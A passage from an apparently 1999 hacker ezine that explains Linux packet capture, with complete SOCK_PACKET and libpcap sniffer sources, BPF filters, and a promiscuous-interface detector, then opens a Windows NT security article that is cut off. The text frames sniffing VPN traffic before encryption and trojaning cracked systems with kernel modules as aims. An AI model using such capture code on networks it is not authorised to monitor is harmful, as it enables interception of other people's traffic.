                 struct  sockaddr ifru_hwaddr;
                 short   ifru_flags;
                 int     ifru_ivalue;
                 int     ifru_mtu;
                 struct  ifmap ifru_map;
                 char    ifru_slave[IFNAMSIZ];
                 char    ifru_newname[IFNAMSIZ];
                 char *  ifru_data;
         } ifr_ifru;
 };

 #define  ifr_name       ifr_ifrn.ifrn_name      /* interface name       */
 #define  ifr_hwaddr     ifr_ifru.ifru_hwaddr    /* MAC address          */
 #define  ifr_addr       ifr_ifru.ifru_addr      /* address              */
 #define  ifr_dstaddr    ifr_ifru.ifru_dstaddr   /* other end of p-p lnk */
 #define  ifr_broadaddr  ifr_ifru.ifru_broadaddr /* broadcast address    */
 #define  ifr_netmask    ifr_ifru.ifru_netmask   /* interface net mask   */
 #define  ifr_flags      ifr_ifru.ifru_flags     /* flags                */
 #define  ifr_metric     ifr_ifru.ifru_ivalue    /* metric               */
 #define  ifr_mtu        ifr_ifru.ifru_mtu       /* mtu                  */
 #define  ifr_map        ifr_ifru.ifru_map       /* device map           */
 #define  ifr_slave      ifr_ifru.ifru_slave     /* slave device         */
 #define  ifr_data       ifr_ifru.ifru_data      /* for use by interface */
 #define  ifr_ifindex    ifr_ifru.ifru_ivalue    /* interface index      */
 #define  ifr_bandwidth  ifr_ifru.ifru_ivalue    /* link bandwidth       */
 #define  ifr_qlen       ifr_ifru.ifru_ivalue    /* Queue length         */
 #define  ifr_newname    ifr_ifru.ifru_newname   /* New name             */


 and through the SIOCGIFFLAGS (Socket I/O Control Get Interface Flags) and
 SIOCSIFFLAGS (Socket I/O Control Set Interface Flags) ioctl() calls. The
 only parameter common to all calls is ifr_name; the rest are used according
 to the operation. Information about the configuration of all available
 interfaces can be obtained through SIOCGIFCONF, using the ifconf structure:

 struct ifconf
 {
         int     ifc_len;
         union
         {
                 char *                  ifcu_buf;
                 struct  ifreq           *ifcu_req;
         } ifc_ifcu;
 };

 #define ifc_buf ifc_ifcu.ifcu_buf
 #define ifc_req ifc_ifcu.ifcu_req


 ifc_len is given the size of the buffer ifcu_buf, which will receive the
 ifreq structures for all interfaces. If the buffer is not large enough, the
 kernel returns only as much information as the buffer can hold, without
 reporting an error. The value of ifc_len is changed to the corresponding
 number. All this is needed so that we can get the list of interfaces
 suitable for sniffing in case none of the standard ones exists, all the
 more so because not every one of them has to correspond to a hardware
 device - a kernel module may create a special interface for a VPN, on which
 we can eavesdrop on the data before it has even been encrypted. For most
 interfaces, however, including when sniffing through libpcap, there may be
 additional data attached to the packet frame, often different for the same
 kind of interface on different operating systems.
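
 Added example (not the article's code): because SIOCGIFCONF fills whatever
 fits and reports no error, a completely filled buffer cannot be told apart
 from a truncated list, so this sketch grows the buffer until the answer
 leaves free room. The simulated_query() stand-in, the "simN" names and the
 helper functions are constructed for illustration; kernel_query() is the
 real ioctl.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <linux/if.h>

/* Source of SIOCGIFCONF answers: the real ioctl or the simulation below */
typedef int (*ifconf_query)(struct ifconf *ifc, void *ctx);

static int kernel_query(struct ifconf *ifc, void *ctx)
{
        return ioctl(*(int *) ctx, SIOCGIFCONF, ifc);
}

/* Constructed stand-in for a host with *ctx interfaces ("sim0", ...).
 * Like the kernel, it fills what fits and reports success regardless. */
static int simulated_query(struct ifconf *ifc, void *ctx)
{
        int have = *(int *) ctx;
        int fit = ifc->ifc_len / (int) sizeof(struct ifreq);
        int i;

        if (fit > have)
                fit = have;
        for (i = 0; i < fit; i++) {
                memset(&ifc->ifc_req[i], 0, sizeof(struct ifreq));
                snprintf(ifc->ifc_req[i].ifr_name, IFNAMSIZ, "sim%d", i);
        }
        ifc->ifc_len = fit * (int) sizeof(struct ifreq);
        return 0;
}

/* One round with room for cap entries; returns the entries filled in */
static int query_once(ifconf_query query, void *ctx, int cap,
                      struct ifreq **out)
{
        struct ifconf ifc;

        *out = calloc((size_t) cap, sizeof(struct ifreq));
        if (*out == NULL)
                return -1;
        ifc.ifc_len = cap * (int) sizeof(struct ifreq);
        ifc.ifc_req = *out;
        if (query(&ifc, ctx) < 0) {
                free(*out);
                *out = NULL;
                return -1;
        }
        return ifc.ifc_len / (int) sizeof(struct ifreq);
}

/* Grow until the answer is smaller than the buffer. Caller frees *out. */
int list_interfaces(ifconf_query query, void *ctx, struct ifreq **out)
{
        int cap, n;

        for (cap = 4; cap <= 4096; cap *= 2) {
                n = query_once(query, ctx, cap, out);
                if (n < 0 || n < cap)
                        return n;       /* error, or the list is complete */
                free(*out);             /* full buffer: may be truncated */
                *out = NULL;
        }
        return -1;
}

/* What a single fixed-size query sees on the simulated host */
int simulated_fixed_count(int have, int cap)
{
        struct ifreq *buf;
        int n = query_once(simulated_query, &have, cap, &buf);

        free(buf);
        return n;
}

/* What the growing loop sees on the simulated host */
int simulated_grown_count(int have)
{
        struct ifreq *buf;
        int n = list_interfaces(simulated_query, &have, &buf);

        free(buf);
        return n;
}

int main(void)
{
        struct ifreq *ifs;
        int i, n, fd = socket(AF_INET, SOCK_DGRAM, 0);

        printf("simulated 50 interfaces: fixed buffer of 20 sees %d, "
               "growing buffer sees %d\n",
               simulated_fixed_count(50, 20), simulated_grown_count(50));
        if (fd < 0) {
                perror("socket");
                return 1;
        }
        n = list_interfaces(kernel_query, &fd, &ifs);
        for (i = 0; i < n; i++)
                printf("%s\n", ifs[i].ifr_name);
        free(ifs);
        close(fd);
        return n < 0;
}
```

 On Linux SIOCGIFCONF reports only interfaces that have an IPv4 address, so
 an audit built on it can miss an address-less interface even when the
 buffer is large enough.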


 When we want to sniff a particular interface, the bind() function is used,
 in the same way as with normal sockets.

 struct sockaddr {
         unsigned short sa_family;
         char sa_data[14];
 };

 The interface name is given in sa_data as a null-terminated string.


 -<sockpacket.c>---------------------------------------------------------
 /* Copyright (C) 1999 kay@phreedom.org; All rights reserved */

 #include <stdio.h>
 #include <stdlib.h>
 #include <unistd.h>
 #include <string.h>
 #include <sys/types.h>
 #include <sys/ioctl.h>
 #include <sys/socket.h>
 #include <arpa/inet.h>
 #include <netinet/ip.h>
 #include <netinet/if_ether.h>
 #include <linux/if.h>

 #include "pdump.h"


 int
 main(int argc, char **argv)
 {
    struct ifreq ifr;          /* Linux interface request control structure */
    short ifr_flags_orig;                     /* Initial flags of interface */
    int sockfd;                                        /* Socket descriptor */
    u_char sp[2000];
    int err;

    printf("Example of non-portable packet sniffer for Linux\n");

    /* We want only Ethernet frames containing IP data */
    sockfd = socket(PF_PACKET, SOCK_PACKET, htons(ETH_P_IP));
    if (sockfd < 0) {
       perror("socket");
       exit(1);
    }

    /* Make the interface promiscuous */
    memset(&ifr, 0, sizeof(ifr));
    strncpy(ifr.ifr_name, INTERFACE, IFNAMSIZ - 1);
    err = ioctl(sockfd, SIOCGIFFLAGS, &ifr);
    if (err < 0) {
       perror("SIOCGIFFLAGS");
       exit(1);
    }
    ifr_flags_orig = ifr.ifr_flags;
    ifr.ifr_flags |= IFF_PROMISC;
    err = ioctl(sockfd, SIOCSIFFLAGS, &ifr);
    if (err < 0) {
       perror("SIOCSIFFLAGS");
       exit(1);
    }

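    /* Read one packet */
    err = read(sockfd, sp, sizeof(sp));
    if (err < 0) {
       perror("read");
       exit(1);
    }

    /* Dump what we caught; the IP header follows the 14-octet Ethernet
     * header, so skip a header dump on frames too short to hold it */
    printf("Dumping %i bytes:\n", err);
    if (err >= ETH_HLEN)
       dump_eth((struct ethhdr *) sp);
    if (err >= ETH_HLEN + (int) sizeof(struct iphdr))
       dump_ip((struct iphdr *) (sp + ETH_HLEN));
    dump_hex((void *) sp, err, 2, 16);
    dump_ascii((void *) sp, err, 16);
    printf("\n\n");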
    printf("\n\n");

    /* Restore original interface flags */
    ifr.ifr_flags = ifr_flags_orig;
    if (ioctl(sockfd, SIOCSIFFLAGS, &ifr) < 0) {
       perror("SIOCSIFFLAGS");
       exit(1);
    }
    close(sockfd);

    return EXIT_SUCCESS;
 }

 /* eof */
 -</sockpacket.c>--------------------------------------------------------

 -<getifconf.c>----------------------------------------------------------
 /* Copyright 1999 Kay <kay@phreedom.org>. All rights Reserved */

 #include <stdio.h>
 #include <stdlib.h>
 #include <unistd.h>
 #include <string.h>
 #include <sys/types.h>
 #include <sys/socket.h>
 #include <sys/ioctl.h>
 #include <linux/if.h>
 #include <linux/if_ether.h>

 int main()
 {
         struct ifconf ifc;
         struct ifreq ifr_x[20];
         int sockfd, err;

         sockfd = socket(PF_PACKET, SOCK_PACKET, 0);
         if (sockfd < 0) {
                 perror("socket");
                 exit(1);
         }

         ifc.ifc_len = 20 * sizeof(struct ifreq);
         ifc.ifc_req = ifr_x;
         if (ioctl(sockfd, SIOCGIFCONF, &ifc) < 0) {
                 perror("ioctl");
                 exit(1);
         }
         /* ifc_len now holds the number of bytes the kernel filled in */
         printf("retrieved info for %i interface(s)\n",
                         (int) (ifc.ifc_len / sizeof(struct ifreq)));
         for (err = 0; err < (int) (ifc.ifc_len / sizeof(struct ifreq)); err++)
                 printf("%s\n", ifr_x[err].ifr_name);
         return EXIT_SUCCESS;
 }

 /* eof */
 -</getifconf.c>---------------------------------------------------------



 2.2. Libpcap primer

 The following program performs absolutely the same functions as
 sockpacket.c, and it is more than obvious how it works.


 -<libpcap.c>------------------------------------------------------------
 /* Portable packet sniffer example - needs libpcap in order to compile
  * Copyright (c) 1999 kay@phreedom.org; All rights reserved */

 #include <stdio.h>
 #include <stdlib.h>
 #include <pcap.h>
 #include <netinet/in.h>
 #include <netinet/ip.h>
 #include <netinet/ether.h>

 #include "pdump.h"


 int main(int argc, char **argv)
 {
    pcap_t *pcap;                /* PCAP descriptor */
    u_char *packet;              /* Our newly captured packet */
    struct pcap_pkthdr pkthdr;   /* PCAP packet information structure */
    char errbuf[PCAP_ERRBUF_SIZE]; /* Filled by pcap_open_live on error */

    printf("Example of portable packet sniffer using Libpcap\n");

    /* Obtain a descriptor for interface, capture no more than
     * 8192 octets, set interface to promiscuous mode, 1000 milliseconds
     * read timeout; errbuf receives the error message on failure */
    pcap = pcap_open_live(INTERFACE, 8192, 1, 1000, errbuf);
    if (pcap == NULL) {
       fprintf(stderr, "pcap_open_live: %s\n", errbuf);
       exit(EXIT_FAILURE);
    }

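    /* Get the next packet from the queue */
    packet = (u_char *) pcap_next(pcap, &pkthdr);

    if (packet != NULL) {
       /* OFFSET octets of link-specific prefix are skipped, so that many
        * fewer octets remain to dump */
       u_long len = pkthdr.caplen > OFFSET ? pkthdr.caplen - OFFSET : 0;

       packet += OFFSET;
       /* Dump the packet in various forms; the IP header follows the
        * Ethernet header (this assumes an Ethernet-style link layer) */
       printf("Dumping %lu bytes:\n", len);
       if (len >= ETH_HLEN)
          dump_eth((struct ethhdr *) packet);
       if (len >= ETH_HLEN + sizeof(struct iphdr))
          dump_ip((struct iphdr *) (packet + ETH_HLEN));
       dump_hex((void *) packet, len, 2, 16);
       dump_ascii((void *) packet, len, 16);
       printf("\n\n");
    } else {
       pcap_perror(pcap, "pcap_next returned NULL");
    }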

    /* Enough for now ... */
    pcap_close(pcap);

    return EXIT_SUCCESS;
 }

 /* eof */
 -</libpcap.c>-----------------------------------------------------------

 const u_char *pcap_next(pcap_t *, struct pcap_pkthdr *);

 Obviously the main work is done by the pcap_next() function, which returns
 a pointer to the next packet from the queue. After that the sniffer works
 exactly as in the previous example. Of course, these examples are in no way
 usable in this form, but they are a good base.


 2.3. BPF Packet filter programs

 Through the Berkeley Packet Filter one can specify a program that filters
 the incoming packets by certain criteria. Such a program consists of an
 array of BPF instructions "executed" on a virtual machine. The instructions
 strongly resemble assembly language. This is an extremely powerful
 mechanism, but writing these programs is often too complicated to be worth
 doing by hand. The following example from the man page shows a program
 that selects only IP packets between 128.3.112.15 and 128.3.112.35:

 /* The addresses are 32-bit words, so they are loaded with BPF_W;
  * a halfword (BPF_H) load could never equal a full address */
 struct bpf_insn insns[] = {
         BPF_STMT(BPF_LD+BPF_H+BPF_ABS, 12),
         BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, ETHERTYPE_IP, 0, 8),
         BPF_STMT(BPF_LD+BPF_W+BPF_ABS, 26),
         BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, 0x8003700f, 0, 2),
         BPF_STMT(BPF_LD+BPF_W+BPF_ABS, 30),
         BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, 0x80037023, 3, 4),
         BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, 0x80037023, 0, 3),
         BPF_STMT(BPF_LD+BPF_W+BPF_ABS, 30),
         BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, 0x8003700f, 0, 1),
         BPF_STMT(BPF_RET+BPF_K, (u_int)-1),
         BPF_STMT(BPF_RET+BPF_K, 0),
 };
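
 Added example (not part of the original article or of libpcap): a minimal
 interpreter for the three instruction kinds this program uses, run over
 constructed frames, to show what "executed on a virtual machine" means.
 The address loads are word loads (BPF_W), since a halfword can never equal
 a 32-bit address; the opcode values are the classic BPF ones, while
 bpf_run() and host_pair_verdict() are names assumed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Classic BPF opcode values; only the subset this program needs */
#define BPF_LD   0x00
#define BPF_JMP  0x05
#define BPF_RET  0x06
#define BPF_W    0x00
#define BPF_H    0x08
#define BPF_ABS  0x20
#define BPF_JEQ  0x10
#define BPF_K    0x00
#define ETHERTYPE_IP 0x0800

struct bpf_insn { uint16_t code; uint8_t jt, jf; uint32_t k; };
#define BPF_STMT(code, k)         { (uint16_t)(code), 0, 0, (k) }
#define BPF_JUMP(code, k, jt, jf) { (uint16_t)(code), (jt), (jf), (k) }

/* Returns the filter verdict: 0 rejects, non-zero is the snapshot length */
uint32_t bpf_run(const struct bpf_insn *prog, size_t n,
                 const uint8_t *p, size_t len)
{
        uint32_t A = 0;                 /* the accumulator */
        size_t pc = 0;

        while (pc < n) {
                const struct bpf_insn *in = &prog[pc++];

                switch (in->code) {
                case BPF_LD + BPF_H + BPF_ABS:  /* A = 16 bits at offset k */
                        if (in->k > len || len - in->k < 2)
                                return 0;       /* load past the capture */
                        A = ((uint32_t)p[in->k] << 8) | p[in->k + 1];
                        break;
                case BPF_LD + BPF_W + BPF_ABS:  /* A = 32 bits at offset k */
                        if (in->k > len || len - in->k < 4)
                                return 0;
                        A = ((uint32_t)p[in->k] << 24) |
                            ((uint32_t)p[in->k + 1] << 16) |
                            ((uint32_t)p[in->k + 2] << 8) | p[in->k + 3];
                        break;
                case BPF_JMP + BPF_JEQ + BPF_K: /* forward jump, relative */
                        pc += (A == in->k) ? in->jt : in->jf;
                        break;
                case BPF_RET + BPF_K:
                        return in->k;
                default:
                        return 0;               /* unsupported instruction */
                }
        }
        return 0;                               /* ran off the end */
}

/* Build a constructed 34-octet frame (EtherType at 12, source address at
 * 26, destination at 30) and run the host-pair program over its first
 * caplen octets. addr_size selects BPF_W or BPF_H for the address loads. */
uint32_t host_pair_verdict(uint16_t addr_size, uint16_t ethertype,
                           uint32_t src, uint32_t dst, size_t caplen)
{
        const struct bpf_insn insns[] = {
                BPF_STMT(BPF_LD + BPF_H + BPF_ABS, 12),
                BPF_JUMP(BPF_JMP + BPF_JEQ + BPF_K, ETHERTYPE_IP, 0, 8),
                BPF_STMT(BPF_LD + addr_size + BPF_ABS, 26),
                BPF_JUMP(BPF_JMP + BPF_JEQ + BPF_K, 0x8003700f, 0, 2),
                BPF_STMT(BPF_LD + addr_size + BPF_ABS, 30),
                BPF_JUMP(BPF_JMP + BPF_JEQ + BPF_K, 0x80037023, 3, 4),
                BPF_JUMP(BPF_JMP + BPF_JEQ + BPF_K, 0x80037023, 0, 3),
                BPF_STMT(BPF_LD + addr_size + BPF_ABS, 30),
                BPF_JUMP(BPF_JMP + BPF_JEQ + BPF_K, 0x8003700f, 0, 1),
                BPF_STMT(BPF_RET + BPF_K, (uint32_t)-1),
                BPF_STMT(BPF_RET + BPF_K, 0),
        };
        uint8_t frame[34];
        int i;

        memset(frame, 0, sizeof(frame));
        frame[12] = (uint8_t)(ethertype >> 8);
        frame[13] = (uint8_t)ethertype;
        for (i = 0; i < 4; i++) {
                frame[26 + i] = (uint8_t)(src >> (24 - 8 * i));
                frame[30 + i] = (uint8_t)(dst >> (24 - 8 * i));
        }
        if (caplen > sizeof(frame))
                caplen = sizeof(frame);
        return bpf_run(insns, sizeof(insns) / sizeof(insns[0]), frame, caplen);
}

int main(void)
{
        const uint32_t a = 0x8003700f, b = 0x80037023;  /* .15 and .35 */

        printf("a->b, word loads:     %#x\n", (unsigned)host_pair_verdict(BPF_W, ETHERTYPE_IP, a, b, 34));
        printf("a->other, word loads: %#x\n", (unsigned)host_pair_verdict(BPF_W, ETHERTYPE_IP, a, b + 1, 34));
        printf("a->b, halfword loads: %#x\n", (unsigned)host_pair_verdict(BPF_H, ETHERTYPE_IP, a, b, 34));
        return 0;
}
```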

 That is why (as with normal languages) a high-level language was created
 at LBL that is "compiled" to BPF instructions. The full documentation is in
 the tcpdump(8) man page. Let us look at the following example:

 -<pfilter.c>------------------------------------------------------------
 /* Packet filter example
  * Copyright (c) 1999 kay@phreedom.org; All rights reserved */

 #include <stdio.h>
 #include <stdlib.h>
 #include <pcap.h>
 #include <netinet/in.h>
 #include <netinet/ip.h>
 #include <netinet/ether.h>

 #include "pdump.h"


 int main(int argc, char **argv)
 {
    pcap_t *pcap;                /* PCAP descriptor */
    u_char *packet;              /* Our newly captured packet */
    struct pcap_pkthdr pkthdr;   /* PCAP packet information structure */
    struct bpf_program fp;       /* Structure to hold the compiled prog */
    char errbuf[PCAP_ERRBUF_SIZE]; /* Filled by pcap_open_live on error */
    char pfprogram[] = "ip host 128.3.112.15 and 128.3.112.35";

    printf("Example of portable packet sniffer using Libpcap\n");

    /* Obtain a descriptor for interface, capture no more than
     * 8192 octets, set interface to promiscuous mode, 1000 milliseconds
     * read timeout; errbuf receives the error message on failure */
    pcap = pcap_open_live(INTERFACE, 8192, 1, 1000, errbuf);
    if (pcap == NULL) {
       fprintf(stderr, "pcap_open_live: %s\n", errbuf);
       exit(EXIT_FAILURE);
    }

    /* Compile and set the filter program */
    if (pcap_compile(pcap, &fp, pfprogram, 1, 0x0) == -1) {
       pcap_perror(pcap, "pcap_compile");
       exit(EXIT_FAILURE);
    }
    if (pcap_setfilter(pcap, &fp) == -1) {
       pcap_perror(pcap, "pcap_setfilter");
       exit(EXIT_FAILURE);
    }

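    /* Get the next packet from the queue */
    packet = (u_char *) pcap_next(pcap, &pkthdr);

    if (packet) {
       /* OFFSET octets of link-specific prefix are skipped, so that many
        * fewer octets remain to dump */
       u_long len = pkthdr.caplen > OFFSET ? pkthdr.caplen - OFFSET : 0;

       /* Dump the packet in various forms; the IP header follows the
        * Ethernet header (this assumes an Ethernet-style link layer) */
       printf("Dumping %lu bytes:\n", len);
       packet += OFFSET;
       if (len >= ETH_HLEN)
          dump_eth((struct ethhdr *) packet);
       if (len >= ETH_HLEN + sizeof(struct iphdr))
          dump_ip((struct iphdr *) (packet + ETH_HLEN));
       dump_hex((void *) packet, len, 2, 16);
       dump_ascii((void *) packet, len, 16);
       printf("\n\n");
    } else {
       printf("Packet not captured because of filter\n");
    }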

    /* Enough for now ... */
    pcap_close(pcap);

    return EXIT_SUCCESS;
 }

 /* eof */
 -</pfilter.c>-----------------------------------------------------------

 The expression "ip host 128.3.112.15 and 128.3.112.35" is translated into a
 BPF program by pcap_compile() and is then attached to the PCAP descriptor
 through pcap_setfilter(). Much easier than the previous example, isn't it?

 Linux Socket Filter (or LSF) is the Linux version of BPF, with some
 additions. Namely: it allows user programs to attach filters to their own
 sockets and in this way filter their connections; it is also easier to use
 as far as "attaching" it is concerned. The filter programs themselves are
 completely identical.


 2.4. Loadable kernel modules

 Loadable kernel modules (LKM) were created to provide a mechanism for
 dynamically adding new functions to the operating system kernel without
 requiring a reboot or any other interruption of normal operation. LKMs,
 which run in ring 0 on most OSes, naturally have rights over all of memory
 and can modify internal kernel structures, as well as hide from the
 administrator's eyes using various techniques. This is quite a good way of
 trojaning cracked systems. For Linux in particular, the kernel interfaces
 and the writing of modules are very well described - for a general
 introduction see "The Linux Kernel" and "Linux Kernel Hacker's Guide" from
 the Linux Documentation Project. The LKM topic is described in detail in
 Phrack 55.


 3. Bibliography and additional files

 Man pages: pcap(3), setsockopt(2), bpf(7)
 RFC's: 791, 792, 793, 894
 IEEE 802 (esp. 802.3)
 UTSL: Linux kernel 2.2.12, libpcap 0.4
 Libpcap: ftp://ftp.ee.lbl.gov
 Linux Documentation Project: http://metalab.unc.edu/LDP
 Phrack Magazine: http://www.phrack.com


 The SOCK_PACKET and PCAP examples use functions from pdump.c for showing
 HEX/ASCII/IP/Ethernet data/structures on a terminal. The Linux-specific
 examples were tested on Debian GNU/Linux 2.1 (kernel 2.0.36 glibc 2.0.7)
 and Debian GNU/Linux 2.2 (kernel 2.2.12 glibc 2.1.2). The PCAP examples
 were tested on Debian GNU/Linux 2.2 + libpcap 0.4 and OpenBSD 2.4 GENERIC,
 libpcap 0.4.


 -<pdump.h>--------------------------------------------------------------
 /* Packet dumping routines, Copyright (c) 1999 Kay <kay@PHREEDOM.ORG> */

 void dump_eth(struct ethhdr *);
 void dump_ip(struct iphdr *);
 void dump_hex(void *, u_long, u_long, u_long);
 void dump_ascii(void *, u_long, u_long);
 -</pdump.h>-------------------------------------------------------------

 -<pdump.c>--------------------------------------------------------------
 /* Packet dumping routines, Copyright (c) 1999 Kay <kay@PHREEDOM.ORG> */

 #include <stdio.h>
 #include <arpa/inet.h>
 #include <netdb.h>
 #include <netinet/in.h>
 #include <netinet/ip.h>
 #include <netinet/tcp.h>
 #include <netinet/ether.h>

 void dump_eth(struct ethhdr *eth)
 {
         int cnt;

         printf("\th_dest   =");
         for (cnt = 0; cnt < ETH_ALEN; cnt++)
                 printf(" %X", eth->h_dest[cnt]);
         printf(";\n\th_source =");
         for (cnt = 0; cnt < ETH_ALEN; cnt++)
                 printf(" %X", eth->h_source[cnt]);
         printf(";\n\th_proto  = %X;\n", eth->h_proto);
         fflush(stdout);
 }

 void dump_ip(struct iphdr *ip)
 {
         struct protoent *pp;
         struct in_addr ia;

         printf("\tihl      = %X;\n", ip->ihl);
         printf("\tversion  = %X;\n", ip->version);
         printf("\ttos      = %X;\n", ip->tos);
         printf("\ttot_len  = %X;\n", ip->tot_len);
         printf("\tid       = %X;\n", ip->id);
         printf("\tfrag_off = %X;\n", ip->frag_off);
         printf("\tttl      = %X;\n", ip->ttl);

         printf("\tprotocol = %X;", ip->protocol);
         pp = getprotobynumber(ip->protocol);
         if (pp == NULL) printf("\n"), perror(NULL);
         else printf("\t(%s)\n", pp->p_name);

         printf("\tcheck    = %X;\n", ip->check);
         ia.s_addr = ip->saddr;
         printf("\tsaddr    = %X;\t(%s)\n", ip->saddr, inet_ntoa(ia));
         ia.s_addr = ip->daddr;
         printf("\tdaddr    = %X;\t(%s)\n", ip->daddr, inet_ntoa(ia));
         fflush(stdout);
 }


 /* It's obvious: *data, how many octets, interval of spaces,
    interval of '\n'-s */
 void dump_hex(void *bare, u_long octets, u_long int_sp, u_long int_nl)
 {
         u_long s;
         u_long spc=0, nlc=0;
         char *buf = (char *) bare;

         for (s=0; s<octets; s++) {
                 if ((u_char)buf[s]<0x10) printf("0");
                 printf("%X", (u_char)buf[s]);
                 if (++spc==int_sp) printf(" "), spc=0;
                 if (++nlc==int_nl) printf("\n"), nlc=0;
                 fflush(stdout);
         }
 }

 int is_printable(char c)
 {
         if ((c >= '0')&&(c <= '9')) return 1;   /* digits */
         if ((c >= 'A')&&(c <= 'Z')) return 1;
         if ((c >= 'a')&&(c <= 'z')) return 1;
         return 0;
 }

 void dump_ascii(void *bare, u_long octets, u_long int_nl)
 {
         u_long s;
         u_long nlc=0;
         char *buf = (char *) bare;

         for(s=0; s<octets; s++) {
                 printf("%c", is_printable(buf[s])?buf[s]:'.');
                 if (++nlc==int_nl) printf("\n"), nlc=0;
                 fflush(stdout);
         }
 }

 /* eof */
 -</pdump.c>-------------------------------------------------------------

 -<Makefile>-------------------------------------------------------------
 # Makefile for examples (c) 1999 kay <kay@phreedom.org>
 # Edit to suit your system.
 # In case of problems when compiling on Linux 2.0 systems, try
 # replacing AF_PACKET with AF_INET.

 # Set interface to sniff. Some common offsets:
 # Ethernet (eth0, le0)        offset 0
 # Loopback (lo, lo0, ...)     offset 4
 # PPP link (ppp0, ppp1, ...)  offset 0
 DEFS=-DINTERFACE=\"lo\" -DOFFSET=4

 CC=cc
 RM=rm -f
 CFLAGS=-O2 -Wall -pipe $(DEFS)
 LIBPCAP=-lpcap

 default:
         @echo "Type one of:"
         @echo "        make pcap    -- build only PCAP examples"
         @echo "        make all     -- build PCAP and Linux-specific examples"

 all:    libpcap pfilter sockpacket lspromisc getifconf

 pcap:   libpcap pfilter

 .c.o:   $@
         $(CC) $(CFLAGS) -c $<

 sockpacket:     pdump.o sockpacket.o
         $(CC) $(CFLAGS) -o sockpacket sockpacket.o pdump.o

 pfilter:        pdump.o pfilter.o
         $(CC) $(CFLAGS) -o pfilter pdump.o pfilter.o $(LIBPCAP)

 libpcap:        libpcap.o pdump.o
         $(CC) $(CFLAGS) -o libpcap libpcap.o pdump.o $(LIBPCAP)

 getifconf:      getifconf.c
         $(CC) $(CFLAGS) -o getifconf getifconf.c

 lspromisc:      lspromisc.c
         $(CC) $(CFLAGS) -o lspromisc lspromisc.c

 clean:
         $(RM) pdump.o sockpacket.o sockpacket libpcap.o \
         libpcap getifconf lspromisc pfilter pfilter.o
 -</Makefile>------------------------------------------------------------

 -<lspromisc.c>----------------------------------------------------------
 /* Copyright 1999 kay@phreedom.org. All rights Reserved */

 #include <stdio.h>
 #include <unistd.h>
 #include <string.h>
 #include <stdlib.h>
 #include <sys/types.h>
 #include <sys/socket.h>
 #include <sys/ioctl.h>
 #include <linux/if.h>

 int main()
 {
         struct ifconf ifc;
         struct ifreq ifr_x[50];
         int sockfd, err, i;

         sockfd = socket(PF_PACKET, SOCK_PACKET, 0);
         if (sockfd < 0) {
                 perror("socket");
                 exit(1);
         }

         ifc.ifc_len = 50 * sizeof(struct ifreq);
         ifc.ifc_req = ifr_x;
         err = ioctl(sockfd, SIOCGIFCONF, &ifc);
         if (err == -1) return EXIT_FAILURE;
         for (i = 0; i < ifc.ifc_len / sizeof(struct ifreq); i++) {
                 err = ioctl(sockfd, SIOCGIFFLAGS, &ifr_x[i]);
                 if (err == -1) perror("SIOCGIFFLAGS: ");
                 else if(ifr_x[i].ifr_flags & IFF_PROMISC)
                         printf("Interface %s is promiscuous\n",
                                ifr_x[i].ifr_name);
         }
         return EXIT_SUCCESS;
 }

 /* eof */
 -</lspromisc.c>---------------------------------------------------------

 >> EOA <<

 -ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú#03ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
  [ a r t i c l e ]                                         [ a u t h o r ]
  Windows NT Security                                         Solar Eclipse
 -ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-

     1) Introduction

 Windows NT is a modern operating system, used mainly for server
 applications. This article will look at the main ideas in the design of
 WinNT, some aspects of its internal structure, and its networking
 capabilities. The emphasis will be on the security of the operating system,
 as well as on the holes in it.

 Windows NT was developed by a team of programmers hired by Microsoft
 specifically for this purpose. Most of them had taken part in the
 development of the VMS operating system for the VAX, so it is not
 surprising that we find quite a lot in common between the two systems. The
 design of WinNT began in November 1988, and the first version (Windows NT
 3.1) came to market 5 years later: in 1993. The explanation that one of the
 project leaders gives for the first version not being 1.0 is interesting -
 according to him the designers were striving for greater compatibility
 between WinNT and Win3.1, and so they decided that the function returning
 the version should return 3.1 in both operating systems. Personally I find
 this explanation strange, but Microsoft are known for liking such tricks.

 Initially Windows NT 3.1 supported the x86 and MIPS architectures. Very
 shortly afterwards Alpha support was added as well. The next versions - 3.5
 and 3.51 - came out in 1994 and 1995 respectively. WinNT now supported
 PowerPC processors too.

 1996 was a key year in the development of NT. That is when version 4.0 came
 out, which managed to establish NT as an operating system that has to be
 taken seriously. One notable element of the new version is the GUI, which
 resembles that of Win95 rather than that of Win3.1. For 'market reasons' (I
 hate that word) support for MIPS and PowerPC was dropped.

 In a few months Windows NT 5 is expected to appear, which will no longer be
 called that, but will be called Windows 2000 (very dumb). Further down I
 will mention what is new in it.

 What does Windows NT look like at the moment? Well, to a great extent it
 resembles Win9x, but there are several very important differences.

     1.1) Network support

 Windows NT is a network operating system. A variety of protocols are
 supported and there is a great variety of utilities for network access -
 starting with the standard ftp, telnet and ping and going as far as tools
 for access to a CIFS network (this is the standard network in a Windows
 environment; it is based on SMB and NetBIOS).

     1.2) Stability

 There is a huge difference between the 9x junk and NT. Although
 applications still crash, this happens only because of bugs in the
 applications themselves. A crash of the whole operating system happens
 quite rarely - unlike 9x, where the blue screen is not the exception but
 the rule. If you do work that requires a Windows environment (for example
 web design or Photoshop) I warmly recommend that you work with Windows NT
 and not with Windows 98.

     1.3) Performance

 NT's main problem is its performance. When Microsoft started designing it,
 they wanted to make a successor to 16-bit Windows. But NT's system
 requirements were so large that it was good for nothing except servers.
 This is no longer the case. Hardware prices have fallen enough for Windows
 NT to run on any average system without particular difficulty (even so, NT
 cannot compare with Linux, which can be run even on a 486 and still work
 quite decently). The next version of NT, Windows 2000, will be the
 successor to and replacement for both NT and Windows 98. This will bring NT
 into wide use among the masses (albeit under another name).

     1.4) Security

